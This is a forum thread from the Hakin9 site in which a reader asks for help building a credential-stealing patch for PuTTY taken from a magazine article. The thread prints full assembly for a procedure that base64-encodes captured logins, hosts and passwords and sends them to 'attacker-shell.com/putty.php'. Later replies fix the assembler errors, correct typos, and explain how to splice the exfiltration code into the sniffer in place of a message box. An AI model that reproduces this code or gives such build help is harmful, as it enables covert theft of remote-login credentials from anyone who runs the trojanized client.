Hakin9 :: Forum

Hello,

I’ve been reading the article Article “Rogue binaries – How to own the software” in page 20 of the issue 01/08.

I successfully compiled the code from “puttysnf.asm – PuTTY password sniffer”

And I get the message box with :

l=admin&p=secretpassword&h=192.168.1.1

So, now I jumped to “Sending Data to the Server”, and the assembler code is:

]

[code]
; send_data – Send Data Procedure

; address where our code starts in memory:
base_address equ 44F4D1h – 100h
; var. containing size of a buffer for base64 code:
buffer_size equ 470B0Ch

; address in memory where the URL will be stored:
URL equ 470BD8h

send_data:

push ebp
mov ebp, esp

cld
mov esi, (base_address + offset str1)
mov edi, URL

copy_str:

; copy the declared URL (pointing to putty.php) into memory
lodsb
test al, al
jz encode_str
xor al, 7Fh
stosb
jmp copy_str

encode_str:

; LoadLibraryA(“crypt32”)
push (base_address + offset str2)
call ds:[450250h]
mov ebx, eax

; LoadLibraryA(“wininet”)
push (base_address + offset str3)
call ds:[450250h]
mov esi, eax

; GetProcAddress(crypt32_hnd,“CryptBinaryToStringA”);
push (base_address + offset str4)
push ebx
call ds:[450284h]
test eax, eax
jz return
mov edi, eax

; CryptBinaryToStringA(created_string, str_length,
; BASE64, URL+str1_length-1, buffer_size)
mov eax, buffer_size
mov dword ptr ds:[eax], 190h

push eax
push (URL + str1_length – 1)
push 1
push dword ptr ds:[str_length]
push created_string
call edi

; GetProcAddress(wininet_hnd, “InternetOpenA”)
push (base_address + offset str5)
push esi
call ds:[450284h]
test eax, eax
jz return

; InternetOpenA(0, 0, 0, 0, 0)
push 0
push 0
push 0
push 0
push 0
call eax

; EDI = internet_hnd
mov edi, eax

; GetProcAddress(wininet_hnd, “InternetOpenUrlA”)
push (base_address + offset str6)
push esi
call ds:[450284h]
test eax, eax
jz return

; InternetOpenUrlA(internet_hnd, URL, 0, 0, 0, 0)
push 0
push 0
push 0
push 0
push URL
push edi
call eax

return:

leave
ret

str1 db ‘http://attacker-shell.com/putty.php?data=’0
str1_length equ $-str1
str2 db ‘crypt32’,0
str3 db ‘wininet’,0
str4 db ‘CryptBinaryToStringA’,0
str5 db ‘InternetOpenA’,0
str6 db ‘InternetOpenUrlA’,0
[/code]

In fact, I don’t know assembler but I wanna learn :=) , so I’m very loose in this. When I tried to compiled the code from http.asm with TASM like this:

[code]> tasm /x http.asm[/code]

It sends me the message:

Assembling file: http.asm
Error http.asm(16) Code or data emission to undeclared segment
Error http.asm(23) Code or data emission to undeclared segment
Error http.asm(24) Code or data emission to undeclared segment
Error http.asm(26) Code or data emission to undeclared segment
Error http.asm(27) Code or data emission to undeclared segment
Error http.asm(33) Need right parenthesis
Error http.asm(34) Value out of range
Error http.asm(38) Need right parenthesis
Error http.asm(39) Value out of range
Error http.asm(43) Need right parenthesis
Error http.asm(45) Value out of range
Error http.asm(57) Code or data emission to undeclared segment
Error http.asm(63) Need right parenthesis
Error http.asm(65) Value out of range
Error http.asm(70) Code or data emission to undeclared segment
Error http.asm(71) Code or data emission to undeclared segment
Error http.asm(72) Code or data emission to undeclared segment
Error http.asm(73) Code or data emission to undeclared segment
Error http.asm(74) Code or data emission to undeclared segment
Error http.asm(81) Need right parenthesis
Error http.asm(83) Value out of range
Error http.asm(88) Code or data emission to undeclared segment
Error http.asm(89) Code or data emission to undeclared segment
Error http.asm(90) Code or data emission to undeclared segment
Error http.asm(91) Code or data emission to undeclared segment
Error http.asm(92) Value out of range
Error http.asm(98) Illegal instruction for currently selected
processor(s)
Error http.asm(99) Code or data emission to undeclared segment
Error http.asm(101) Code or data emission to undeclared segment
Error http.asm(103) Code or data emission to undeclared segment
Error http.asm(104) Code or data emission to undeclared segment
Error http.asm(105) Code or data emission to undeclared segment
Error http.asm(106) Code or data emission to undeclared segment
Error http.asm(107) Code or data emission to undeclared segment
Fatal http.asm(108) Unexpected end of file encountered
Error messages: 35
Warning messages: None
Passes: 1
Remaining memory: 401k[/code]

So, What I’m supossed to do? I have to insert http.asm in puttysnf.asm ? where?

Thanks in advace,
Pedro

Hi there,sorry for waiting so much,we are all busy ::)

Here are some steps that may help:

1.check your path (PATH=%PATH%;C:\TASM\BIN)
2.run a linker to generate executable file tlink/v
3.there are bugs in version 4,so you may try to add this at beginning of code and at end:

something:
CODE GOES HERE
end something;

4.its better to use MASM or NASM

anyway try this and send us result

You’re just about there, actually.

I missed this the first time, too. “http.asm” needs to be inserted into “puttysnf.asm” near its end, right here:
-—————————————————————-
[we’re in puttysnf.asm]

return_to_host:
; pass the control back to the PuTTY’s code
popad
push 43C85Ah
ret
<~~~~~~~~~~~~~~~~ Insert http.asm file right here
code ends
end start
-————————————————————————————————————————
The article says, "The procedure needs to be added to the source code of PuTTY
password sniffer (for example, at the end, just above the line containing code ends).
Before we close the puttysnf.asm file, we must delete the call to the MessageBoxA function
(along with the arguments pushed onto the stack) and invoke the send _ data procedure instead by
writing:

call send_data

The code has to be compiled in exactly the same manner as last time." on page 28.
-————————————————————————————————————————-
But again, I missed it, too.

There are also a couple of accidental typos that need to be cleaned up; I’m sure you’ve already found
and fixed them already, but noting this may save other people some time.

Near the end of “http.asm”, there’s the word “leave” by itself. It’s supposed to be a comment. Change it to “; leave” .
-——————————————————————
Near the start of “puttysnf.asm”, there’s a typo:

start:
; call ToAsciiEx
call ds:[450320h]
pushad
mov edi, created_string
mov ecx, ds:[str_length]
add edi, ecx
; finish, if str_length==0xFF
cmp cl, 0FFh
je return_tovw_host <~~ typo is here. It should read, je return_to_host .

; check if ENTER or BACKSPACE was hit.
-————————————————————
And just FYI, my assembler (MASM 6.11) just would not assemble:

push (URL + str1_length – 1) ; in http.asm

Since URL is defined near the start of http, and str1_length near the end, you can do the math yourself and put in the right value. I have no idea why it does this.

; puttysnf.asm – PuTTY password sniffer
.386
code segment
assume cs:code, ds:code
org 100h

Briefly, the .386 tells the Assembler to allow instructions for the 386 and lesser processors, but also NOT to allow instructions that only showed up in the 486, Pentium, and later.

The code segment tells the assembler we’re going to do instructions here. Usually there is a “data segment” right before stored data, but this is a very special case program, a patch, so the programmer just put the data in with the program.

The “segment registers” are usually: “cs:code, ds:data, ss:stack”. But again, this is a special case, so the programmer is telling the Assembler to assume those registers are pointing at the start of the code.

There is the whole business of “segment registers” pointing to a 64K window into memory which is really a pain. Now that we can do real 32-bit coding, we’re coming out of the Dark Ages of segment registers.

org 0100h tells the assembler where to assume the instructions start.

(Note: always begin a hex value with a 0, it helps the Assembler not goof; for example, if you do a JUMP FOOFh, should the assembler make a JUMP to location $F00F, or a JUMP to a label named FOOFh ? … and if it doesn’t find that label, it’ll give you a “label not found” error. It’s a good habit to get into.)

Congratulations on getting through the “devil is in the details” of TASM. I’m using MASM and it took me a day to learn all the little things it needed before it would assemble this program. Stubborn persistence is a trait of successful assembly programmers, and the startup is really a bit of a “learning cliff”.

Let me know how it goes from here, okay?

Thanks,